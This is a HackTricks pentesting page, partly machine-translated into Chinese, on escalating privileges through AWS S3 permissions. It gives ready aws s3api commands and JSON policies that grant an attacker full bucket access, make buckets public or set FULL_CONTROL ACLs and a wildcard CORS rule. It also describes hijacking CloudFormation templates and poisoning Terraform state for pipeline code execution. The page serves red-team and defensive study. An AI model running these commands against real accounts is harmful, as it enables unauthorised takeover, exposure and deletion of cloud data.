AWS - S3 Privesc

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

S3

s3:PutBucketNotification, s3:PutObject, s3:GetObject

拥有这些权限的攻击者如果能访问有价值的 bucket,可能能够劫持资源并提升权限。

例如,攻击者对名为 “cf-templates-nohnwfax6a6i-us-east-1” 的 对 cloudformation bucket 的权限 时,可以劫持部署。访问权限可以通过如下策略授予:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:PutBucketNotification",
"s3:GetBucketNotification",
"s3:PutObject",
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::cf-templates-*/*",
"arn:aws:s3:::cf-templates-*"
]
},
{
"Effect": "Allow",
"Action": "s3:ListAllMyBuckets",
"Resource": "*"
}
]
}

And the hijack is possible because there is a 从模板上传到 bucket 的那一刻起的短暂时间窗口,直到模板被部署为止。攻击者可能只需在其账户中创建一个lambda function,该函数会在收到 bucket 通知 时触发,并劫持该bucket内容

The Pacu module cfn__resouce_injection can be used to automate this attack.
更多信息请查看原始研究: https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/

s3:PutObject, s3:GetObject

这些权限允许从 S3 获取和上传对象。AWS 内部(以及外部)的多个服务使用 S3 存储来保存config files
具有读取权限的攻击者可能会从中发现敏感信息
具有写入权限的攻击者可以篡改数据以滥用某些服务并尝试提升权限
例如:

  • 如果某个 EC2 实例将user data 存储在 S3 bucket中,攻击者可以修改该数据以在 EC2 实例内执行任意代码

s3:PutObject, s3:GetObject (optional) over terraform state file

在实际中,terraform 状态文件通常会被保存到云提供商的 blob 存储,例如 AWS S3。状态文件的文件后缀是 .tfstate,而 bucket 名称通常也会表明它们包含 terraform 状态文件。通常每个 AWS 账号都有这样一个 bucket 来存放描述账号状态的状态文件。现实中,几乎所有开发者通常都拥有 s3:*,有时甚至业务用户也有 s3:Put*

因此,如果你对这些文件具有上述权限,就存在一个攻击向量,允许你以 terraform 的权限(大多数情况下是 AdministratorAccess)在流水线中获得 RCE,从而成为云账号的管理员。同时,你也可以利用该向量发起拒绝服务(DoS)攻击,比如通过让 terraform 删除合法资源。

关于可直接使用的利用代码,请参阅 Terraform Security 页面中 Abusing Terraform State Files 一节的描述:

Abusing Terraform State Files

s3:PutBucketPolicy

An attacker, that needs to be 来自同一账号, if not the error The specified method is not allowed will trigger, with this permission will be able to grant himself more permissions over the bucket(s) allowing him to read, write, modify, delete and expose buckets.

# Update Bucket policy
aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>

## JSON giving permissions to a user and mantaining some previous root access
{
"Id": "Policy1568185116930",
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:root"
},
"Action":"s3:ListBucket",
"Resource":"arn:aws:s3:::somebucketname"
},
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:user/username"
},
"Action":"s3:*",
"Resource":"arn:aws:s3:::somebucketname/*"
}
]
}

## JSON Public policy example
### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{
"Id": "Policy1568185116930",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Stmt1568184932403",
"Action": [
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome",
"Principal": "*"
},
{
"Sid": "Stmt1568185007451",
"Action": [
"s3:GetObject"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome/*",
"Principal": "*"
}
]
}

s3:GetBucketAcl, s3:PutBucketAcl

一个 attacker 可以滥用这些权限以 为自己授予对特定 buckets 的更高访问权限
注意,该 attacker 不需要来自同一个账户。 此外,写入权限

# Update bucket ACL
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json

##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL

s3:GetObjectAcl, s3:PutObjectAcl

An attacker 可以滥用这些 permissions 来授予自己对 buckets 中特定 objects 的更多访问权限。

# Update bucket object ACL
aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json

##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL

s3:GetObjectAcl, s3:PutObjectVersionAcl

具有这些权限的攻击者应该能够将 Acl 应用于特定的对象版本。

aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json

s3:PutBucketCORS

拥有 s3:PutBucketCORS 权限的攻击者可以修改 bucket 的 CORS (Cross-Origin Resource Sharing) 配置,该配置控制哪些网站域名可以访问其端点。如果他们设置了过于宽松的策略,任何网站都可以向该 bucket 发起直接请求并在浏览器中读取响应。

这意味着,如果某个为托管在该 bucket 上的 web app 已经认证的用户访问了攻击者的网站,攻击者可能会利用宽松的 CORS 策略,并根据应用情况,访问该用户的个人资料数据,甚至劫持该用户的账户。

aws s3api put-bucket-cors \
--bucket <BUCKET_NAME> \
--cors-configuration '{
"CORSRules": [
{
"AllowedOrigins": ["*"],
"AllowedMethods": ["GET", "PUT", "POST"],
"AllowedHeaders": ["*"],
"ExposeHeaders": ["x-amz-request-id"],
"MaxAgeSeconds": 3000
}
]
}'

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks